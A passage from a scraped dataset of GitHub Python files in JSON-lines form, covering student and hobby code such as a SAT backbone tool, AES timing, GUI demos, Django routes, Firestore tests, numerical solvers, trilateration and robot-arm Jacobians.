kissat(assumed_file)\n if not sat:\n backbone.append(literal)\n append_dimacs(formula_file, inferred_file, literal)\n os.rename(inferred_file, formula_file)\n else:\n temp = set(model)\n for c in candidates:\n if c[1] not in temp:\n c[1] = 0\n\n delete(formula_file)\n delete(assumed_file)\n delete(inferred_file)\n return backbone, formula\n\ndef clean_backbone(backbone, formula):\n backbone = set(backbone)\n new_formula = []\n \n for literal in backbone:\n new_formula.append([literal])\n\n for clause in formula:\n done = False\n for literal in backbone:\n if literal in clause:\n done = True\n break\n if done:\n continue\n new_clause = []\n for literal in clause:\n if -literal in backbone:\n continue\n new_clause.append(literal)\n new_formula.append(new_clause)\n\n return new_formula\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Computes and removes backbones.')\n parser.add_argument('--input', help='DIMACS input file', required=True)\n parser.add_argument('--backbone', help='backbone output file')\n parser.add_argument('--output', help='DIMACS output file')\n args = parser.parse_args()\n\n backbone, formula = find_backbone(args.input)\n variable_map = read_variable_map(args.input)\n\n if backbone:\n if args.backbone:\n readable_backbone = [('+' if l > 0 else '-') + (variable_map[abs(l)] if abs(l) in variable_map else str(abs(l))) for l in backbone]\n f = open(args.backbone, mode=\"w+\")\n for literal in readable_backbone:\n f.write(literal + '\\n')\n f.close()\n\n if args.output:\n new_formula = clean_backbone(backbone, formula)\n write_dimacs(args.output, new_formula, variable_map)\n \n else:\n print('formula unsatisfiable')","repo_name":"ekuiter/torte","sub_path":"docker/solver/other/backbone_kissat.py","file_name":"backbone_kissat.py","file_ext":"py","file_size_in_byte":6248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20478753429","text":"import re\nimport json\nimport os\nfrom pprint import pprint\nimport svgwrite\nimport networkx as nx\nfrom matplotlib import pyplot as plt\nimport time\n\ntestdict = {'p':{\n 'a': {\n 'aa': {},\n 'ab': {\n 'aba': {},\n 'abb': {\n 'abba': {},\n 'abbb': {}\n },\n 'abc': {}\n },\n 'ac': {\n\n }\n },\n 'b': {\n 'ba': {\n 'baa': {\n\n },\n 'bab': {}\n },\n 'bb': {}\n }}\n}\n\n\ngraph = nx.from_dict_of_dicts(testdict)\n\nnx.draw(graph)\nplt.draw()\nplt.show()\n","repo_name":"Sergiogd112/ClassNotes","sub_path":"dict_to_mmap.py","file_name":"dict_to_mmap.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1525271669","text":"import AES256\nimport time\nfrom readBlockFile import *\nfrom readKeyFile import *\n\nstartExec = time.time()\n#Read blocks and key from files\nprint(\"-- Reading plaintext --\")\nstart = time.time()\nblocks = getBlocks(\"tWotW.txt\")\nkey = getKey(\"testKey\")\nencBlocks = []\nreadPlainTime = time.time() - start\n\n## Encrypt\nprint(\"-- Encrypting --\")\nstart = time.time()\nexpKey = AES256.getExpKey(key)\nfor block in blocks:\n\t#Add filler bytes in the last block\n\twhile len(block) != 16:\n\t\tblock.append(0)\n\tencBlocks.append(AES256.encrypt(block, expKey))\nencTime = time.time() - start\n\t\n#The real MVP: https://stackoverflow.com/questions/17349918/python-write-string-of-bytes-to-file\n## Write encrypted data to file\nprint(\"-- Writing encrypted data to file --\")\nstart = time.time()\nwith open(\"encFile\", 'wb') as file:\n\tfor eBlock in encBlocks:\n\t\tfile.write(bytearray(eBlock))\n\tfile.close()\nwriteEncTime = time.time() - start\n\n## Read encrypted file\t\nprint(\"-- Reading encrypted file --\")\nstart = time.time()\nblocks = getBlocks(\"encFile\")\ndecBlocks = []\nreadEncTime = time.time() - start\n\n## Decrypt\nprint(\"-- Decrypting --\")\nstart = time.time()\nexpKey = AES256.getExpKey(key)\nfor block in blocks:\n\tdecBlocks.append(AES256.decrypt(block, expKey))\n\n## Clean filler bytes in last block\nfor count in range(15,-1,-1):\n\tif decBlocks[len(decBlocks)-1][count] == 0:\n\t\tdecBlocks[len(decBlocks)-1].pop(count)\n\telse:\n\t\tbreak\ndecTime = time.time() - start\n\t\t\n## Write decrypted data to file\nstart = time.time()\nwith open(\"decFile\", 'wb') as file:\n\tfor dBlock in decBlocks:\n\t\tfile.write(bytearray(dBlock))\n\tfile.close()\nwriteDecTime = time.time() - start\nexecTime = time.time() - startExec\n\n#https://stackoverflow.com/questions/1557571/how-do-i-get-time-of-a-python-programs-execution\nprint(\"Total execution time: %s seconds\" % (execTime))\nprint(\"Read plaintext time: %s seconds\\nWrite encrypted time: %s seconds\\nRead encrypted time: %s seconds\\nWrite decrypted time: %s seconds\" % (readPlainTime, writeEncTime, readEncTime, writeDecTime))\nprint(\"Encryption time: %s seconds\\nDecryption time: %s seconds\" % (encTime, decTime))","repo_name":"Tivoro/DT2017","sub_path":"AES/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73617575848","text":"from tkinter import *\nfrom tkinter import ttk\nfrom tkinter import Text\nroot = Tk()\nfrm = ttk.Frame(root, padding=100)\nfrm.grid()\nt = Text(frm, width = 40, height = 1, wrap = \"none\")\nys = ttk.Scrollbar(root, orient = 'vertical', command = t.yview)\nxs = ttk.Scrollbar(root, orient = 'horizontal', command = t.xview)\nt['yscrollcommand'] = ys.set\nt['xscrollcommand'] = xs.set\nt.insert('end', \"Lorem ipsum...\\n...\\n...\")\nt.grid(column = 0, row = 0, sticky = 'nwes')\nxs.grid(column = 0, row = 1, sticky = 'we')\nys.grid(column = 1, row = 0, sticky = 'ns')\nroot.grid_columnconfigure(0, weight = 1)\nroot.grid_rowconfigure(0, weight = 1)\nttk.Button(frm, text=\"Quit\", command=root.destroy).grid(column=1, row=0)\nttk.Label(frm, text=\"Hello World!\").grid(column=0, row=2)\n\nroot.mainloop()","repo_name":"Basith5075/Data_Science_Submission","sub_path":"Certification/Practice/python-practice/Tkinter/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38676850912","text":"from kivy.lang import Builder\nfrom kivy.properties import ListProperty, NumericProperty\nfrom kivy.uix.effectwidget import EffectWidget\n\nfrom .blureffect import BlurEffect\nfrom .saturationeffect import SaturationEffect\nfrom .luminancerangeeffect import LuminanceRangeEffect\n\nBuilder.load_string('''\n:\n tint_color: 1, 1, 1, 0\n\n canvas.after:\n Color:\n rgba: self.tint_color\n Rectangle:\n pos: self.effect_region[:2]\n size: self.effect_region[2:]\n''')\n\n\nclass RealtimeBlurWidget(EffectWidget):\n effect_region = ListProperty([0, 0, 0, 0])\n\n blur_radius = NumericProperty(14.0)\n\n saturation = NumericProperty(0.8)\n\n range_reduction = NumericProperty(1.0)\n\n tint_color = ListProperty([0, 0, 0, 0])\n\n def __init__(self, *args, **kwargs):\n super(RealtimeBlurWidget, self).__init__(*args, **kwargs)\n self.saturate_effect = SaturationEffect(saturation=self.saturation)\n self.luminance_effect = LuminanceRangeEffect(range_reduction=self.range_reduction)\n self.blur_effect = BlurEffect(blur_radius=self.blur_radius)\n self.effects = [self.saturate_effect, self.blur_effect, self.luminance_effect]\n self.update()\n\n def update(self):\n self.blur_effect.blur_radius = int(self.blur_radius)\n self.saturate_effect.saturation = float(self.saturation)\n self.luminance_effect.range_reduction = float(self.range_reduction)\n\n def on_blur_radius(self, instance, radius):\n self.blur_effect.blur_radius = int(radius)\n\n def on_saturation(self, instance, saturation):\n self.saturate_effect.saturation = float(saturation)\n\n def on_range_reduction(self, instance, reduction):\n self.luminance_effect.range_reduction = float(reduction)\n\n def on_effect_region(self, instance, region):\n self.saturate_effect.effect_region = map(float, region)\n self.luminance_effect.effect_region = map(float, region)\n self.blur_effect.effect_region = map(float, region)","repo_name":"Schlaubischlump/KivyRealtimeBlur","sub_path":"realtimeblur/blurwidget.py","file_name":"blurwidget.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27465918141","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'SquirrelApp'\n\nurlpatterns = [\n path('index', views.index, name='index'),\n path('sightings', views.sightings, name='sightings'),\n path('sightings/details/', views.sighting_details, name='detail'),\n path('sightings/add', views.add_page, name='add_page'),\n path('sightings/stats', views.stats, name='stats'),\n path('sightings/', views.update_page, name='update_page'),\n path('add', views.update_request, name=\"add\"),\n path('update', views.update_request, name=\"update\"),\n path('map',views.map,name='map'),\n\n ]\n \n","repo_name":"charlotte-liao/Squirrel-project1","sub_path":"SquirrelApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18673047895","text":"import datetime\nimport json\nimport logging\nimport os\nimport unittest\n\nimport requests\n\nfrom bookmarks_sync.firebase_app import FirebaseApp\nfrom bookmarks_sync.firestore_database import BookmarkRecord, FirestoreDatabase\n\n\ndef load_json(file_name):\n return json.loads(open(file_name).read())\n\n\nsingle_bookmark = load_json(\"tests/resources/single_bookmark.json\")\n\nlogging.basicConfig(level=\"DEBUG\")\nlogger = logging.getLogger(\"TestFirestoreDatabase\")\n\napp = FirebaseApp.admin(\"bullfrog-reader\")\n\n\ndef clear_database():\n logger.debug(\"clearing db\")\n r = requests.delete(\n \"http://localhost:8080/emulator/v1/projects/bullfrog-reader/databases/(default)/documents\"\n )\n logger.debug(f\"done; status={r.status_code}\")\n\n\nclass BookmarkRecords(object):\n\n @classmethod\n def from_pocket_record(cls, pocket_record) -> BookmarkRecord:\n return {\n \"pocket_item_id\":\n \"A84FB302-F7B6-4D88-BC36-5369812BBA90\",\n \"url\":\n pocket_record[\"given_url\"],\n \"pocket_created_at\":\n datetime.datetime.fromtimestamp(int(pocket_record[\"time_added\"])),\n \"pocket_updated_at\":\n datetime.datetime.fromtimestamp(int(pocket_record[\"time_updated\"])),\n \"pocket_json\":\n json.dumps(pocket_record),\n \"text\": \"foo\",\n \"metadata\": None,\n }\n\n\n\nclass TestFirestoreDatabase(unittest.TestCase):\n\n def setUp(self):\n os.environ[\"FIRESTORE_EMULATOR_HOST\"] = \"localhost:8080\"\n os.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"tests/resources/test-project-4abbf-199fc0e689ec.json\"\n clear_database()\n\n def test_save_items(self):\n db = FirestoreDatabase.admin(app)\n db.add_items(\n \"user@blfrg.xyz\",\n [BookmarkRecords.from_pocket_record(single_bookmark[\"item_0\"])],\n )\n\n def test_get_latest(self):\n db = FirestoreDatabase.admin(app)\n bm0 = db.get_latest_bookmark(\"user@blfrg.xyz\")\n self.assertEqual(bm0, None)\n bm1 = BookmarkRecords.from_pocket_record(single_bookmark[\"item_0\"])\n bm2 = BookmarkRecords.from_pocket_record(single_bookmark[\"item_0\"])\n bm2[\"url\"] = \"http://last.com\"\n db.add_items(\n \"user@blfrg.xyz\",\n [bm1],\n )\n db.add_items(\n \"user@blfrg.xyz\",\n [bm2],\n )\n bm = db.get_latest_bookmark(\"user@blfrg.xyz\")\n self.assertEqual(bm[\"url\"], \"http://last.com\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"Bullfrog-Labs/bullfrog","sub_path":"bfr/ingest-gcf/tests/test_firestore_database.py","file_name":"test_firestore_database.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10996471113","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 6 21:17:16 2018\n\n@author: john3\n\"\"\"\nimport os #be care with this will return true for directories and files\nimport pandas as pd\nimport requests\nimport bs4 as bs\nfrom collections import OrderedDict\n\n#{ticker:{year:{label:value}}}\n\n\ntickers=[\"snn\"]\nyearlabelvaluedict={}\ntickeryearlabelvaluedict={}\n\nfor ticker in tickers:\n IncomeUrl=\"https://www.marketwatch.com/investing/stock/\"+ticker+\"/financials\"\n respIncomeStatement=requests.get(IncomeUrl)\n soup=bs.BeautifulSoup(respIncomeStatement.text, \"lxml\")\n IncomeLabels=[e.get_text() for e in soup.select(\".rowTitle\")] #soup perused and labels and ratios extracted and fed into vbls based upon html characteristics\n IncomeValues=[e.get_text() for e in soup.select(\".valueCell\")] #soup perused and labels and ratios extracted and fed into vbls based upon html characteristics\n IncomeValues[0]=\"Currency\"\n new_dict=OrderedDict({k:v for k, v in zip(IncomeLabels, IncomeValues)})\nprint(new_dict)\n #the selected labels and selected ratios combined togteher into dictionary\n #tickerlabelratiodict[ticker.upper()]=OrderedDict(new_dict) #label:ratio dictionary as values into another dictionary where stock ticker for each group is the key\n #df=pd.DataFrame.from_dict(tickerlabelratiodict, orient=\"columns\")# dictionary turned into a pandas dataframe","repo_name":"scads88/Fundamentals","sub_path":"test13.py","file_name":"test13.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41118179302","text":"import matplotlib.pyplot as plt\nimport math\ny1 = []\ny2 = []\nprev_y1 = 1\nprev_y2 = 0\nbegin_t = 0 \nstep = 0.001\nepsi = 0.001\ncheck = False \ny1.insert(0,prev_y1)\ny2.insert(0,prev_y2)\n#Первое уравнение системы\ndef f1(y1, y2):\n return -0.08*y1 + 1.304*y2\n#Второе уравнение системы \ndef f2(y1, y2):\n return -1.31*y1 - 13.21*y2\n\n#Использование метода Рунге-Кутта для начальной таблицы \ndef runge_kutta(prev_y1, prev_y2, h):\n k11 = f1(prev_y1, prev_y2)\n k12 = f2(prev_y1, prev_y2)\n\n k21 = f1(prev_y1 + h * k11 / 2, prev_y2 + h * k12 / 2)\n k22 = f2(prev_y1 + h * k11 / 2, prev_y2 + h * k12 / 2)\n\n k31 = f1(prev_y1 + h * k21 / 2, prev_y2 + h * k22 / 2)\n k32 = f2(prev_y1 + h * k21 / 2, prev_y2 + h * k22 / 2)\n\n k41 = f1(prev_y1 + h * k31, prev_y2 + h * k32)\n k42 = f2(prev_y1 + h * k31, prev_y2 + h * k32)\n\n next_y1 = prev_y1 + (h / 6) * (k11 + 2 * k21 + 2 * k31 + k41)\n next_y2 = prev_y2 + (h / 6) * (k12 + 2 * k22 + 2 * k32 + k42)\n\n return [next_y1, next_y2]\nprint(\"step=%0.3f, y1=%0.3f, y2=%0.3f\"%(begin_t, y1[0], y2[0]))\nfor i in range(4):\n [prev_y1, prev_y2] = runge_kutta(prev_y1, prev_y2, step)\n print(\"step =%0.3f, y1 = %0.6f y2 = %0.6f\" % (step * (i + 1), prev_y1, prev_y2))\n y1.append(prev_y1)\n y2.append(prev_y2)\nplt.plot(step, 'o',y1, y2)\nplt.show()\n\ndef prediction_and_correction(y1,y2, f1,f2, step,check,epsi):\n #Этап прогноза\n pred_y1 = y1[-1] + step/24*(55*f1(y1[-1],y2[-1])-59*f1(y1[-2],y2[-2])+ 37*f1(y1[-3],y2[-3])-9*f1(y1[-4],y2[-4]))\n pred_y2 = y2[-1] + step/24*(55*f2(y1[-1],y2[-1])-59*f2(y1[-2],y2[-2]) + 37*f2(y1[-3],y2[-3])-9*f2(y1[-4],y2[-4]))\n #Этап коррекции\n corr_y1 = y1[-1] + step/24*(9*f1(pred_y1,pred_y2) + 19*f1(y1[-1],y2[-1])- 5*f1(y1[-2],y2[-2]) + f1(y1[-3],y2[-3]))\n corr_y2 = y2[-1] + step/24*(9*f2(pred_y1,pred_y2)+ 19*f2(y1[-1],y2[-1])-5*f2(y1[-2],y2[-2]) + f2(y1[-3],y2[-3]))\n summa = math.sqrt(math.pow(corr_y1 - pred_y1,2)+math.pow(corr_y2 - pred_y2,2))\n while summa < epsi:\n check = True\n y1.append(corr_y1)\n y1.append(corr_y2)\n print('yn1 на этапе прогноза:',pred_y1 ,'yn2 на этапе прогноза:',pred_y2,'yn1 на этапе коррекции:',corr_y1,'yn2 на этапе коррекции:',corr_y2,'Выполнение условия:',check)\n\nprint(prediction_and_correction(y1,y2, f1,f2, step,check,epsi))\n","repo_name":"MrFlava/justforfun","sub_path":"prediction_and_correction.py","file_name":"prediction_and_correction.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16795328357","text":"class TooYoungException(Exception):\n def __init__(self,age):\n self.age=age\nclass TooOldException(Exception):\n def __init__(self,age):\n self.age=age\ntry:\n age=int(input(\"Enter Age:\"))\n if age<18:\n raise TooYoungException(\"Plz wait some time \")\n elif age>65:\n raise TooOldException(\"Your age too old\")\n else:\n print(\"we will find one girl soon\")\nexcept TooYoungException as e:\n print(\"Plz wait some time \")\nexcept TooOldException as e:\n print(\"Your age too old \")\n\n\"\"\"5) Output\nEnter Age: 16\nPlz wait some time \n\nEnter Age:20\nwe will find one girl soon\n\nEnter Age:66\nYour age too old\"\"\"","repo_name":"thanksduck/Python22","sub_path":"Assignment /Assignment 4/Solution-5.py","file_name":"Solution-5.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"24302249444","text":"# Tu programa debe:\n\n# Pedir al usuario que ingrese una palabra.\n# Utilizar userWord = userWord.upper() para convertir la palabra ingresada por el usuario a mayúsculas; \n# Usa la ejecución condicional y la instrucción continue para \"comer\" las siguientes vocales A , E , I , O , U de la palabra ingresada.\n# Asigne las letras no consumidas a la variable palabrasinVocal e imprime la variable en la pantalla.\n\n\n# Datos de prueba\n\n# Entrada de muestra: Gregory\n\n# Salida esperada:\n# GRGRY\n\n# Entrada de muestra: abstemious\n\n# Salida esperada:\n# BSTMS\n\nuserWord = input(\"ingrese una palabra: \")\nuserWord = userWord.upper()\n\nfor i in userWord:\n if i == \"A\":\n continue\n elif i == \"E\":\n continue\n elif i == \"I\":\n continue\n elif i == \"O\":\n continue\n elif i == \"U\":\n continue\n else:\n print(i)\n\n","repo_name":"AlexRodriguezVillavicencio/algorithms-python","sub_path":"devoradorVocales.py","file_name":"devoradorVocales.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26524517627","text":"import json\nimport traceback\n\nfrom django.http.response import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.decorators.http import require_POST\n\nfrom blueapps.account.decorators import login_exempt\nfrom gcloud.contrib.admin.migration_api.decorators import require_migrate_token\nfrom gcloud.constants import TASK_CATEGORY\nfrom gcloud import err_code\nfrom gcloud.label.models import Label, TemplateLabelRelation\nfrom gcloud.tasktmpl3.models import TaskTemplate\nfrom django.utils.translation import ugettext_lazy as _\nimport logging\n\nlogger = logging.getLogger(\"root\")\n\n\n@login_exempt\n@csrf_exempt\n@require_POST\n@require_migrate_token\ndef migrate_template_category(request):\n try:\n params = json.loads(request.body)\n except Exception as e:\n message = _(f\"非法请求: 数据错误, 请求不是合法的Json格式, {e} | migrate_template_category\")\n logger.error(message)\n return JsonResponse(\n {\n \"result\": False,\n \"message\": message,\n \"code\": err_code.REQUEST_PARAM_INVALID.code,\n }\n )\n\n project_id = params.get(\"project_id\")\n creator = params.get(\"creator\", \"admin\")\n\n MIGRATE_LABEL_COLOR = \"#b3eafa\"\n category_mappings = {}\n existing_labels = Label.objects.filter(project_id=project_id).values(\"id\", \"name\")\n label_info = {label[\"name\"]: label[\"id\"] for label in existing_labels}\n for category_code, category_name in TASK_CATEGORY:\n if category_name in label_info:\n category_mappings[category_code] = label_info[category_name]\n elif category_code != \"Default\":\n label = Label(\n name=category_name,\n description=category_code,\n is_default=False,\n creator=creator,\n color=MIGRATE_LABEL_COLOR,\n project_id=project_id,\n )\n label.save()\n category_mappings[category_code] = label.id\n\n task_templates = TaskTemplate.objects.filter(project__id=project_id, is_deleted=False).values(\"id\", \"category\")\n label_relationships = [\n TemplateLabelRelation(template_id=template[\"id\"], label_id=category_mappings[template[\"category\"]])\n for template in task_templates\n if template[\"category\"] in category_mappings\n ]\n try:\n TemplateLabelRelation.objects.bulk_create(label_relationships, ignore_conflicts=True)\n except Exception as e:\n return JsonResponse(\n {\n \"result\": False,\n \"error\": \"migrate template category to labels error: {} \\n {}\".format(e, traceback.format_exc()),\n }\n )\n\n return JsonResponse({\"result\": True, \"data\": \"migrate template category to labels success\"})\n","repo_name":"TencentBlueKing/bk-sops","sub_path":"gcloud/contrib/admin/migration_api/template_category.py","file_name":"template_category.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":1001,"dataset":"github-code","pt":"53"} +{"seq_id":"74226097126","text":"import math\n\nimport plotly.io as pio\nimport plotly.graph_objects as go\n\nfrom .trilateration_utils import *\n\nimport numpy as np\nimport tensorflow as tf\n\ntilateration_debug = False\n\ndef trilateration(distance_map, room, shapes):\n beacons_x = [distance_map_item[\"x\"] for distance_map_item in distance_map]\n beacons_y = [distance_map_item[\"y\"] for distance_map_item in distance_map]\n beacons_r = [distance_map_item[\"r\"] for distance_map_item in distance_map]\n beacons_var = [distance_map_item[\"var\"] for distance_map_item in distance_map]\n\n x = tf.Variable([0], dtype=tf.float32)\n y = tf.Variable([0], dtype=tf.float32)\n\n X = tf.placeholder(tf.float32, [len(beacons_x), ])\n Y = tf.placeholder(tf.float32, [len(beacons_y), ])\n R = tf.placeholder(tf.float32, [len(beacons_r), ])\n\n cost = ((x - X) ** 2 + (y - Y) ** 2 - R ** 2) ** 2\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n\n learning_rate = 0.001\n optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost)\n\n n_iter = 1000\n # errors = []\n\n err = []\n\n for i in range(n_iter):\n _, err = sess.run([optimizer, cost], {\n X: beacons_x,\n Y: beacons_y,\n R: beacons_r\n })\n\n # errors.append(err)\n avg_error = (sum(err) / float(len(err))) ** 0.5\n if avg_error < 0.2:\n print(sum(err))\n break\n\n \n x, y, = sess.run(\n [x, y], {\n X: beacons_x, \n Y: beacons_y, \n R: beacons_r\n })\n\n avg_error = (sum(err) / float(len(err))) ** 0.5\n\n avg_error += max(beacons_var)\n\n result = [\n 0.0 if math.isnan(x[0]) else x[0].astype(float),\n 0.0 if math.isnan(y[0]) else y[0].astype(float),\n 1000.0 if math.isnan(avg_error) else avg_error\n ]\n\n # result = [result[0].astype(float), result[1].astype(float), result[2]]\n\n print(result, sum(err))\n\n if tilateration_debug:\n shapes.append(dict(\n type=\"circle\",\n xref=\"x\",\n yref=\"y\",\n x0 = result[0] - result[2],\n y0 = result[1] - result[2],\n x1 = result[0] + result[2],\n y1 = result[1] + result[2],\n line=dict(width=2, color=\"#FF9999\"),\n ))\n\n shapes.append(add_point(result[0:2], 0.05, \"#FF9999\"))\n\n\n return result\n\ndef multilateration(distance_map, room, shapes, SET_SIZE=3):\n print(distance_map)\n\n if len(distance_map) == 4:\n results = [\n trilateration([distance_map[i] for i in [1,2,3]], room, shapes),\n trilateration([distance_map[i] for i in [0,2,3]], room, shapes),\n trilateration([distance_map[i] for i in [0,1,3]], room, shapes),\n trilateration([distance_map[i] for i in [0,1,2]], room, shapes),\n trilateration(distance_map, room, shapes)\n ]\n\n result = sorted(results, key=lambda x: x[2])[0]\n else:\n result = trilateration(distance_map, room, shapes)\n \n return result","repo_name":"glitchcore/trilateration","sub_path":"gradient_multilat.py","file_name":"gradient_multilat.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13355617290","text":"\nprint(\"import utils module sucessfully.\")\nimport numpy as np\nimport math\n\ndef sgn(x):\n if x<0:\n return -1\n elif x==0:\n return 0\n return 1\n\ndef transl(x,y,z):\n mat = np.eye(4)\n mat[0,3] = x\n mat[1,3] = y\n mat[2,3] = z\n return mat\n\ndef trotz(rot):\n mat = np.eye(4)\n mat[0,0] = math.cos(rot)\n mat[0,1] = - math.sin(rot)\n mat[1,0] = math.sin(rot)\n mat[1,1] = math.cos(rot)\n return mat\n\ndef trotx(rot):\n mat = np.eye(4)\n mat[1,1] = math.cos(rot)\n mat[1,2] = -math.sin(rot)\n mat[2,1] = math.sin(rot)\n mat[2,2] = math.cos(rot)\n return mat\n\ndef t2r(T):\n mat = T[0:3,0:3]\n return mat\n\ndef Jacob(q):\n '''\n especially for UR5\n '''\n d = np.array([0.0895, 0 ,0 ,0.1091 ,0.0946 ,0.0823])\n a = np.array([0, -0.4250, -0.3922, 0, 0, 0])\n alpha = np.array([1.5708, 0, 0, 1.5708, -1.5708, 0])\n offset = np.array([0, 0, 0, 0, 0, 0])\n thd = q + offset\n \n #T0=trotz(0)@transl(0,0,0)@trotx(0)@transl(0,0,0)\n T0 = np.matmul(trotz(0), transl(0,0,0))\n T0 = np.matmul(T0, trotx(0))\n T0 = np.matmul(T0, transl(0,0,0))\n # T1=trotz(thd[0])@transl(0,0,d[0])@trotx(alpha[0])@transl(a[0],0,0)\n T1 = np.matmul(trotz(thd[0]), transl(0,0,d[0]))\n T1 = np.matmul(T1, trotx(alpha[0]))\n T1 = np.matmul(T1, transl(a[0],0,0))\n # T2=trotz(thd[1])@transl(0,0,d[1])@trotx(alpha[1])@transl(a[1],0,0)\n T2 = np.matmul(trotz(thd[1]), transl(0,0,d[1]))\n T2 = np.matmul(T2, trotx(alpha[1]))\n T2 = np.matmul(T2, transl(a[1],0,0))\n # T3=trotz(thd[2])@transl(0,0,d[2])@trotx(alpha[2])@transl(a[2],0,0)\n T3 = np.matmul(trotz(thd[2]), transl(0,0,d[2]))\n T3 = np.matmul(T3, trotx(alpha[2]))\n T3 = np.matmul(T3, transl(a[2],0,0))\n # T4=trotz(thd[3])@transl(0,0,d[3])@trotx(alpha[3])@transl(a[3],0,0)\n T4 = np.matmul(trotz(thd[3]), transl(0,0,d[3]))\n T4 = np.matmul(T4, trotx(alpha[3]))\n T4 = np.matmul(T4, transl(a[3],0,0))\n # T5=trotz(thd[4])@transl(0,0,d[4])@trotx(alpha[4])@transl(a[4],0,0)\n T5 = np.matmul(trotz(thd[4]), transl(0,0,d[4]))\n T5 = np.matmul(T5, trotx(alpha[4]))\n T5 = np.matmul(T5, transl(a[4],0,0))\n # T6=trotz(thd[5])@transl(0,0,d[5])@trotx(alpha[5])@transl(a[5],0,0)\n T6 = np.matmul(trotz(thd[5]), transl(0,0,d[5]))\n T6 = np.matmul(T6, trotx(alpha[5]))\n T6 = np.matmul(T6, transl(a[5],0,0))\n\n T00 = T0\n T01 = T1\n T02 = np.matmul(T01, T2)\n T03 = np.matmul(T02, T3)\n T04 = np.matmul(T03, T4)\n T05 = np.matmul(T04, T5)\n T06 = np.matmul(T05, T6)\n\n # T16 = T2@T3@T4@T5@T6\n T16 = np.matmul(T2, T3)\n T16 = np.matmul(T16, T4)\n T16 = np.matmul(T16, T5)\n T16 = np.matmul(T16, T6)\n # T26 = T3@T4@T5@T6\n T26 = np.matmul(T3, T4)\n T26 = np.matmul(T26, T5)\n T26 = np.matmul(T26, T6)\n # T36 = T4@T5@T6\n T36 = np.matmul(T4, T5)\n T36 = np.matmul(T36, T5)\n # T46 = T5@T6\n T46 = np.matmul(T5, T6)\n T56 = T6\n\n R00 = t2r(T00)\n R01 = t2r(T01)\n R02 = t2r(T02)\n R03 = t2r(T03)\n R04 = t2r(T04)\n R05 = t2r(T05)\n R06 = t2r(T06)\n\n Z0 = R00[: , 2:3]\n Z1 = R01[: , 2:3]\n Z2 = R02[: , 2:3]\n Z3 = R03[: , 2:3]\n Z4 = R04[: , 2:3]\n Z5 = R05[: , 2:3]\n Z6 = R06[: , 2:3]\n\n P06 = T06[0:3, 3:4]\n P16 = T16[0:3, 3:4]\n P26 = T26[0:3, 3:4]\n P36 = T36[0:3, 3:4]\n P46 = T46[0:3, 3:4]\n P56 = T56[0:3, 3:4]\n # P66 = np.zeros((3,1))\n J1 = np.append(np.cross(Z0.T, np.matmul(R00, P06).T).T, Z0,axis = 0)\n J2 = np.append(np.cross(Z1.T, np.matmul(R01, P16).T).T, Z1,axis = 0)\n J3 = np.append(np.cross(Z2.T, np.matmul(R02, P26).T).T, Z2,axis = 0)\n J4 = np.append(np.cross(Z3.T, np.matmul(R03, P36).T).T, Z3,axis = 0)\n J5 = np.append(np.cross(Z4.T, np.matmul(R04, P46).T).T, Z4,axis = 0)\n J6 = np.append(np.cross(Z5.T, np.matmul(R05, P56).T).T, Z5,axis = 0)\n \n J = np.concatenate((J1, J2, J3, J4, J5, J6), axis = 1)\n\n return J\n\nif __name__ == \"__main__\":\n print(Jacob(np.array([1,1,1,1,1,1]))) #Debug\n","repo_name":"Edify0991/RoboticsSim","sub_path":"src/GripSim_Vrep/scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9366726642","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\"\"\"Tests for aodh/storage/impl_sqlalchemy.py\n\n.. note::\n In order to run the tests against real SQL server set the environment\n variable aodh_TEST_SQL_URL to point to a SQL server before running\n the tests.\n\n\"\"\"\n\nfrom aodh.storage import impl_sqlalchemy as 